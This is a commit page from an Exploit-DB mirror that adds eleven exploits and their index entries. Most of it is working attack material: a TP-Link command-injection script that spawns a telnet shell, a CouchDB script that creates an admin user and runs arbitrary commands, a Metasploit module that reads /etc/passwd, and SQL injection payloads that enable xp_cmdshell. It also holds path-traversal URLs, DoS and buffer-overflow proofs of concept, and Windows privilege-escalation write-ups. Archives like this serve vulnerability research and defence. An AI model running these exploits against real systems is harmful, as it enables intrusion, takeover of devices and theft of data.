bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2018-06-21

Browse source 
11 changes to exploits/shellcodes

Redis 5.0 - Denial of Service
ntp 4.2.8p11 - Local Buffer Overflow (PoC)
Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Mirasys DVMS Workstation 5.12.6 - Path Traversal
MaDDash 2.0.2 - Directory Listing
NewMark CMS 2.1 - 'sec_id' SQL Injection
TP-Link TL-WA850RE - Remote Command Execution
Apache CouchDB < 2.1.0 - Remote Code Execution
IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)
VideoInsight WebClient 5 - SQL Injection
This commit is contained in:
Offensive Security 2018-06-21 05:01:44 +00:00
parent ff17a097d9
commit ac267cb298
12 changed files with 620 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

78
exploits/hardware/webapps/44912.py Executable file
View file

@ -0,0 +1,78 @@
#!/usr/bin/env python
# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Command Execution
# Date: 19/06/2018
# Exploit Author: yoresongo - Advisability S.A.S Colombia (www.advisability.co)
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Tested on: Firmware Version TL-WA850RE_V5_180228
# Contact: yoresongo [at] advisability.co
import argparse
import requests
import hashlib
import telnetlib
parser = argparse.ArgumentParser(
description="Exploits TP-LINK WA850RE Command injection"
)
parser.add_argument("host", help="Host to attack.", type=str)
parser.add_argument("password", help="Extender's Password", type=str)
parser.add_argument(
"-C", "--cookie", help="Cookie id value.", type=str, default="1301a8c000c4c505"
)
args = parser.parse_args()
HOST = args.host
PASSWORD = args.password
COOKIE = args.cookie
cookies = {"gsScrollPos-8016": "0", "COOKIE": COOKIE}
headers = {
"Origin": "http://%s/" % HOST,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,es;q=0.8",
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Referer": "http://%s/" % HOST,
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"DNT": "1",
}
password = hashlib.md5(PASSWORD.encode("utf-8")).hexdigest().upper()
encoded = "%s:%s" % (password, COOKIE)
encoded = hashlib.md5(encoded.encode("utf-8")).hexdigest().upper()
data = [("operation", "login"), ("encoded", encoded), ("nonce", COOKIE)]
# Payload
data_inject = [
("operation", "write"),
("option", "connect"),
("wps_setup_pin", "11480723;telnetd -l /bin/sh"),
]
with requests.Session() as s:
response = s.post(
"http://%s/data/login.json" % HOST, headers=headers, cookies=cookies, data=data
)
print(response.text)
# An authorised request.
r = s.get("http://%s" % HOST, headers=headers, cookies=cookies)
# print (r.text)
r = s.post(
"http://%s/data/wps.setup.json" % HOST,
headers=headers,
cookies=cookies,
data=data_inject,
)
tn = telnetlib.Telnet(HOST)
tn.interact()

26
exploits/java/webapps/44910.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: MaDDash 2.0.2 - Directory Listing
# Date: 2018-06-18
# Vendor: perfSONAR
# Download Link: https://github.com/esnet/maddash/archive/master.zip
# Version: 2.0.2
# Exploit Author: ManhNho
# CVE: CVE-2018-12522,CVE-2018-12523,CVE-2018-12524,CVE-2018-12525
# Category: Webapps
# Tested on: Windows 7
--- Description ---
A directory listing is inappropriately exposed, yielding potentially
sensitive information to attackers.
A directory listing provides an attacker with the complete index of all the
resources located inside of the directory.
The specific risks and consequences vary depending on which files are
listed and accessible.
---Affected items---
http://127.0.0.1/maddash-webui/etc/
http://127.0.0.1/maddash-webui/lib/
http://127.0.0.1/maddash-webui/images/
http://127.0.0.1/maddash-webui/style/
---References---
https://pastebin.com/eA5tGKf0

50
exploits/linux/dos/44908.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Redis 5.0 Denial of Service
# Date: 2018-06-13
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/download
# Version: 5.0
# Fixed on: 5.0
# CVE : CVE-2018-12453
Type confusion in the xgroupCommand function in t_stream.c in redis-server in Redis before 5.0 allows remote attackers to cause denial-of-service via an XGROUP command in which the key is not a stream.
PoC:
$ ./src/redis-cli -p 1234
127.0.0.1:1234> set a 123
OK
127.0.0.1:1234> xgroup create a b $
Error: Connection reset by peer <— segfault'ed
127.0.0.1:1234>
The bug also could be triggered via netcat
$ nc 127.0.0.1 1234
set a 123
+OK
xgroup create a b $ <— segfaulted after this line
@@ -1576,7 +1576,7 @@ NULL
/* Lookup the key now, this is common for all the subcommands but HELP. */
if (c->argc >= 4) {
robj *o = lookupKeyWriteOrReply(c,c->argv[2],shared.nokeyerr);
- if (o == NULL) return;
+ if (o == NULL || checkType(c,o,OBJ_STREAM)) return;
s = o->ptr;
grpname = c->argv[3]->ptr;
#0 0x6d0706 in logStackContent /home/user/redis/src/debug.c:732:45
#1 0x6d3917 in sigsegvHandler /home/user/redis/src/debug.c:1089:5
#2 0x7f65d736e38f (/lib/x86_64-linux-gnu/libpthread.so.0+0x1138f)
#3 0x804afc in streamLookupCG /home/user/redis/src/t_stream.c:1502:12
#4 0x805b36 in xgroupCommand /home/user/redis/src/t_stream.c:1584:19
#5 0x58ded7 in call /home/user/redis/src/server.c:2298:5
#6 0x591c70 in processCommand /home/user/redis/src/server.c:2580:9
#7 0x5e2d98 in processInputBuffer /home/user/redis/src/networking.c:1325:17
#8 0x565612 in aeProcessEvents /home/user/redis/src/ae.c:443:17
#9 0x56614c in aeMain /home/user/redis/src/ae.c:501:9
#10 0x59da71 in main /home/user/redis/src/server.c:3992:5
#11 0x7f65d6d9d82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#12 0x43da38 in _start (/home/user/redis/src/redis-server+0x43da38)

26
exploits/linux/dos/44909.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: ntpq and ntpdc 4.2.8p11 Local Buffer Overflow
# Date: 2018-06-06
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: http://www.ntp.org/
# Software Link: http://www.ntp.org/downloads.html
# Version: 4.2.8p11 and earlier
# Tested on: 4.2.8p11
# CVE : CVE-2018-12327
Stack-based buffer overflow in ntpq and ntpdc of NTP version 4.2.8p11 allows a local attacker to achieve code execution or escalate to higher privileges via a long string as the argument for an IPv4 or IPv6 command-line parameter.
$ ./ntpq -4 [`python -c 'print "A" * 300`]
#0 0x562fcada86ce in openhost /home/user/ntp-4.2.8p11/ntpq/ntpq.c:655:12
#1 0x562fcada5f2a in ntpqmain /home/user/ntp-4.2.8p11/ntpq/ntpq.c:606:10
#2 0x562fcada4729 in main /home/user/ntp-4.2.8p11/ntpq/ntpq.c:469:9
#3 0x7f79b684982f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x562fcac96d88 in _start (/home/user/ntp-4.2.8p11/ntpq/ntpq+0xacd88)
$ ./ntpdc -4 [`python -c 'print "A" * 300'`]
#0 0x55f726641efe in openhost /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:413:12
#1 0x55f7266400d4 in ntpdcmain /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:365:10
#2 0x55f72663f269 in main /home/user/ntp-4.2.8p11/ntpdc/ntpdc.c:255:9
#3 0x7f0fc632382f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#4 0x55f7265362d8 in _start (/home/user/ntp-4.2.8p11/ntpdc/ntpdc+0x9d2d8)

37
exploits/linux/webapps/44911.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: NewMark CMS 2.1 - SQL Injection (sec_id)
# Google Dork: /catalog/?sect_id=
# Date: 2018-06-20
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://nmark.ru/
# Software Link: https://nmark.ru/razrabotka/korporativniy-sayt/
# Version: v2.1
# Tested on: Pardus
# CVE : N/A
# Prof Of Consept
# sec id parameter affected by sql injection
# payload:
http://Target/catalog/?sect_id=e00d4757
# Parameter: sect_id (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: sect_id=-7753" OR 1455=1455#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#
Payload: sect_id=e00d4757" AND (SELECT 6440 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT(ELT(6440=6440,1))),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- twet
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
Payload: sect_id=e00d4757" AND SLEEP(5)-- UNpo
# Type: UNION query
# Title: MySQL UNION query (NULL) - 2 columns
Payload: sect_id=-1642" UNION ALL SELECT CONCAT(0x71717a7171,0x6f6a4d7666725478634c4d4657504e646650437571724b634c437176506149794645795a67424c67,0x716a7a6b71),NULL#

126
exploits/linux/webapps/44913.py Executable file
View file

@ -0,0 +1,126 @@
# Title: Apache CouchDB < 2.1.0 - Remote Code Execution
# Author: Cody Zacharias
# Shodan Dork: port:5984
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/
# Version: <= 1.7.0 and 2.x - 2.1.0
# Tested on: Debian
# CVE : CVE-2017-12636
# References:
# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/
# Proof of Concept: python exploit.py --priv -c "id" http://localhost:5984
#!/usr/bin/env python
from requests.auth import HTTPBasicAuth
import argparse
import requests
import re
import sys
def getVersion():
version = requests.get(args.host).json()["version"]
return version
def error(message):
print(message)
sys.exit(1)
def exploit(version):
with requests.session() as session:
session.headers = {"Content-Type": "application/json"}
# Exploit privilege escalation
if args.priv:
try:
payload = '{"type": "user", "name": "'
payload += args.user
payload += '", "roles": ["_admin"], "roles": [],'
payload += '"password": "' + args.password + '"}'
pr = session.put(args.host + "/_users/org.couchdb.user:" + args.user,
data=payload)
print("[+] User " + args.user + " with password " + args.password + " successfully created.")
except requests.exceptions.HTTPError:
error("[-] Unable to create the user on remote host.")
session.auth = HTTPBasicAuth(args.user, args.password)
# Create payload
try:
if version == 1:
session.put(args.host + "/_config/query_servers/cmd",
data='"' + args.cmd + '"')
print("[+] Created payload at: " + args.host + "/_config/query_servers/cmd")
else:
host = session.get(args.host + "/_membership").json()["all_nodes"][0]
session.put(args.host + "/_node/" + host + "/_config/query_servers/cmd",
data='"' + args.cmd + '"')
print("[+] Created payload at: " + args.host + "/_node/" + host + "/_config/query_servers/cmd")
except requests.exceptions.HTTPError as e:
error("[-] Unable to create command payload: " + e)
try:
session.put(args.host + "/god")
session.put(args.host + "/god/zero", data='{"_id": "HTP"}')
except requests.exceptions.HTTPError:
error("[-] Unable to create database.")
# Execute payload
try:
if version == 1:
session.post(args.host + "/god/_temp_view?limit=10",
data='{"language": "cmd", "map": ""}')
else:
session.post(args.host + "/god/_design/zero",
data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
print("[+] Command executed: " + args.cmd)
except requests.exceptions.HTTPError:
error("[-] Unable to execute payload.")
print("[*] Cleaning up.")
# Cleanup database
try:
session.delete(args.host + "/god")
except requests.exceptions.HTTPError:
error("[-] Unable to remove database.")
# Cleanup payload
try:
if version == 1:
session.delete(args.host + "/_config/query_servers/cmd")
else:
host = session.get(args.host + "/_membership").json()["all_nodes"][0]
session.delete(args.host + "/_node" + host + "/_config/query_servers/cmd")
except requests.exceptions.HTTPError:
error("[-] Unable to remove payload.")
def main():
version = getVersion()
print("[*] Detected CouchDB Version " + version)
vv = version.replace(".", "")
v = int(version[0])
if v == 1 and int(vv) <= 170:
exploit(v)
elif v == 2 and int(vv) < 211:
exploit(v)
else:
print("[-] Version " + version + " not vulnerable.")
sys.exit(0)
if __name__ == "__main__":
ap = argparse.ArgumentParser(
description="Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)")
ap.add_argument("host", help="URL (Example: http://127.0.0.1:5984).")
ap.add_argument("-c", "--cmd", help="Command to run.")
ap.add_argument("--priv", help="Exploit privilege escalation (CVE-2017-12635).",
action="store_true")
ap.add_argument("-u", "--user", help="Admin username (Default: guest).",
default="guest")
ap.add_argument("-p", "--password", help="Admin password (Default: guest).",
default="guest")
args = ap.parse_args()
main()

127
exploits/multiple/webapps/44916.rb Executable file
View file

@ -0,0 +1,127 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
'Description' => %q{
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.
This module was tested against 2.0.5. This has been fixed in 2.0.6.
},
'Author' => [ 'Sanjiv Kawa @kawabungah' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-10956' ],
[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
],
'DisclosureDate' => 'May 7, 2018'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
Opt::RPORT(80)
], self.class )
end
def init_request(path)
res = send_request_cgi({
'method' => 'GET',
'uri' => path
})
return res
end
def run
path = normalize_uri(target_uri.path)
res = init_request(path)
if res && res.code == 200
file = Array.new
trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
file = [datastore['FILE']]
else
file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
end
for i in 0 .. file.length - 1
path = normalize_uri(target_uri.path) + trigger + file[i]
res = init_request(path)
if res.code == 200
print_good("Obtained #{datastore['FILE']}")
puts res.body
puts ""
else
print_error("#{datastore['FILE']} does not exist")
puts res.body
puts ""
end
end
else
print_error("Web Server is Unresponsive")
end
end
end
__END__
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options
Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes This is the file to download
INPUTFILE no Specify a list of files to downloads
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.100.100.100 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Orchid VMS
VHOST no HTTP server virtual host
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run
[+] Obtained /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

50
exploits/windows/dos/44914.txt Normal file
View file

@ -0,0 +1,50 @@
Windows: Desktop Bridge Activation Arbitrary Directory Creation EoP
Platform: Windows 10 1703, 1709 (not tested RS4)
Class: Elevation of Privilege
Summary: The activator for Desktop Bridge applications calls CreateAppContainerToken while running as a privileged account leading to creation of arbitrary object directories leading to EoP.
Description:
As much of the activation of Desktop Bridge applications require TCB privilege (such as creating the container) its delegated to the AppInfo service which runs as Local System. During post activation, either through RAiLaunchProcessWithIdentity or RAiFinishPackageActivation the API PostCreateProcessDesktopAppXActivation is called in daxexec which sets up various things. One of those things is registering the process with the Process State Manager service and to do that it passes an AppContainer token for the AppX package.
To create the token the service will call the API CreateAppContainerToken, however it doesnt impersonate the user while doing this which results in the service setting up the AppContainer object directories as the process user. By placing symbolic links into these locations arbitrary object directories can be created, as long as the parent directory can be written by Local System. The created directories are also given an explicit DACL which grants the user access so that they can also be written to by the original user once created.
On Windows 8.1 this would be trivial to exploit as NtCreateLowBoxToken didnt care what handles you passed it for capture, however since CVE-2015-2554 (which I reported) the system call checks that the directories are under the AppContainerNamedObjects directory for the user. Theyre still created but once NtCreateLowBoxToken is called theyll be closed again. However due to the way kernel objects persist it just becomes a race condition, as long as you open the directory you want before all handles are closed then you can keep it alive to do what you need to do with it. In practice it seems to be possible to capture the directory reliably but perhaps only on multi core systems.
IMO this might be best to fix in CreateAppContainerToken, perhaps by impersonating the base token which is being used to create the lowbox one. Ive tried to track down cases before where this function is called inappropriately and it wouldnt surprise me if theres more bad callers for this function as impersonation can be tricky to get right, especially when hidden behind RAI C++ classes.
As an aside its also worth noting that this type of bug is of more general application to the session 0 AppContainerNamedObjects directory. That directory granted access to the Everyone group to write to it as shown below.
PS C:\> $d = Get-NtDirectory \Sessions\0\AppContainerNamedObjects
PS C:\> $d.SecurityDescriptor.Dacl
Type User Flags Mask
---- ---- ----- ----
Allowed Everyone None 0002000F
Allowed NT AUTHORITY\SYSTEM None 000F000F
Allowed NT AUTHORITY\RESTRICTED None 00000002
Allowed APPLICATION PACKAGE AUTHORI... None 00000003
Allowed APPLICATION PACKAGE AUTHORI... None 00000003
Allowed NT AUTHORITY\SYSTEM ObjectInherit, Co... 10000000
Previously nothing used it in Session 0 but in a recent update the UMFD process spawns in Session 0 as an AC and so the directories would be created by a system process which could be redirected. Im not sure thats very useful but its something which you might also want to fix.
Proof of Concept:
Ive provided a PoC as a C# project. As its a race condition it should be run on a multi-core machine to give the threads a chance to capture the directory object. It might work on a single core as well but Ive not tested it. If it fails to get the directory try it again as its possible that the race wasnt successfully won. It uses the My Office application as with previous exploits, if its not installed then the PoC will fail. However it doesnt need a specific Desktop Bridge application just any installed will do though youd have to modify the package information in the PoC to do so. The PoC will try and create the folder \Blah in the object manager namespace.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the PoC, if the PoC says that OfficeHub is already running ensure its closed.
3) If a dialog appears saying the application has failed to start click OK.
4) The poc should print whether it captured the directory and if so what access was granted.
Expected Result:
Create of the application should fail and the directories are not created.
Observed Result:
The directories are created, the application will still fail.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44914.zip

39
exploits/windows/dos/44915.txt Normal file
View file

@ -0,0 +1,39 @@
Windows: Windows: Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix EoP
Platform: Windows 1709 (not tested earlier version)
Class: Elevation of Privilege
Summary: The handling of the virtual registry for desktop bridge applications can allow an application to create arbitrary files as system resulting in EoP. This is because the fix for CVE-2018-0880 (MSRC case 42755) did not cover all similar cases which were reported at the same time in the issue.
Description:
Looking at the fix for CVE-2018-0880 the Cache directory and sub files are now secured so only admins and system can access them. This breaks my original PoC but it doesnt fix the issue. In my original report I also noted that User.dat and UserClasses.dat could also be abused in the same way and those files exist in the Helium directory above the Cache. Therefore the exact same attack can be employed on the Helium directory instead of the Cache directory.
To be honest Im not even convinced that locking down the security on the Cache directory is a robust fix. As we have FILE_DELETE_CHILD access on the Helium directory we could always rename the Cache folder and the activator will recreate it for us. With a bit of effort we could mount the original attack through things like holding a reference to one of the files with WRITE_DAC permissions and race the security descriptor checks in DAXEXEC!OfflineRegistry::EnsureCacheIsSafe. Itd be slightly more work but not unduly so.
IMO the only real way to fix this issue would be completely remove the opportunity to replace the registry cache files from a normal user, perhaps by placing them in a secondary location on the system such as under a secured directory in c:\ProgramData.
I also havent bothered to check if youve fixed the read issue that I also reported as part of case 42755. Ive no reason to believe you have based on what I can see in the code.
Proof of Concept:
Ive provided a PoC as a C# project. In order for the exploit to work you need a copy of the Get Office/My Office application installed (I tested with version 17.8830.7600.0). It could be any desktop bridge application however as you just need to run a program inside the container although for that to work some strings in the poc would need to be changed.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Start the poc. It should print that it successfully created the badgers.dll file in system32.
The exploit works as follows:
* The Helium folder is renamed to Helium-X.
* The Helium folder is recreated as a mount point which redirects to the object manager directory \RPC Control
* Symbolic links are dropped for the registry hive files. The LOG files are redirected to an arbitrary name in the windows folder.
Note that the PoC will leave the user profile for the Office Hub application broken, you should delete the fake Helium folder and rename the Helium-X folder to try the exploit again.
Expected Result:
The application creation fails or at least the symbolic links arent followed.
Observed Result:
The file badgers.dll is created in the system32 folder which is writable by a normal user.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44915.zip

23
exploits/windows/webapps/44907.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6
# Date: 10-06-2018
# Exploit Author: Onvio, Dick Snel, https://www.onvio.nl
# Vendor Homepage: https://www.mirasys.com/
# Software Link: https://www.onvio.nl/binaries/mirasys_5_12_6.zip
# Version: <= 5.12.6
# Tested on: Windows 10 Pro x64
# CVE : CVE-2018-8727
1. Description
Path Traversal in Gateway in Mirasys DVMS Workstation <= 5.12.6 allows an attacker to traverse the file system to access files or directories via the Web Client webserver.
More detail on the exploit: https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
2. Proof of Concept
http://localhost:9999/.../.../.../.../.../.../.../.../.../windows/win.ini
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
3. Solution
Upgrade to any version > 5.12.6

26
exploits/windows/webapps/44917.txt Normal file
View file

@ -0,0 +1,26 @@
# Title: VideoInsight WebClient 5 - SQL Injection
# Date: 2018-05-06
# Author: vosec
# Vendor Homepage: https://www.security.us.panasonic.com/
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/
# Version: 5
# Tested on: Windows Server 2008 R2
# CVE: N/A
# Description:
# This exploit is based on CVE-2017-5151 targeting versions prior.
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability
# that can be used for remote code execution.
# SQL Injection - PoC
# From the web login page submit the following string as the username with anything in the password field.
# The web server will hang for 5 seconds:
UyYr');WAITFOR DELAY '00:00:05'--
# Remote Code Execution - PoC
# From the web login page submit each of the following strings as the username, one at a time, with anything
# in the password field (with the ping, use a valid IP address that you can monitor):
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';--

13
files_exploits.csv
View file

@ -5999,6 +5999,10 @@ id,file,description,date,author,type,platform,port
44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
44908,exploits/linux/dos/44908.txt,"Redis 5.0 - Denial of Service",2018-06-20,"Fakhri Zulkifli",dos,linux,
44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux,
44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -39336,7 +39340,7 @@ id,file,description,date,author,type,platform,port
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,80
44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
@ -39561,3 +39565,10 @@ id,file,description,date,author,type,platform,port
44901,exploits/php/webapps/44901.html,"Joomla! Component Jomres 9.11.2 - Cross-Site Request Forgery (Add User)",2018-06-18,L0RD,webapps,php,
44902,exploits/linux/webapps/44902.txt,"RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery (Add Admin)",2018-06-18,"Dolev Farhi",webapps,linux,
44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,
44907,exploits/windows/webapps/44907.txt,"Mirasys DVMS Workstation 5.12.6 - Path Traversal",2018-06-20,Onvio,webapps,windows,
44910,exploits/java/webapps/44910.txt,"MaDDash 2.0.2 - Directory Listing",2018-06-20,ManhNho,webapps,java,
44911,exploits/linux/webapps/44911.txt,"NewMark CMS 2.1 - 'sec_id' SQL Injection",2018-06-20,"Berk Dusunur",webapps,linux,
44912,exploits/hardware/webapps/44912.py,"TP-Link TL-WA850RE - Remote Command Execution",2018-06-20,yoresongo,webapps,hardware,
44913,exploits/linux/webapps/44913.py,"Apache CouchDB < 2.1.0 - Remote Code Execution",2018-06-20,"Cody Zacharias",webapps,linux,
44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80
44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,

Can't render this file because it is too large.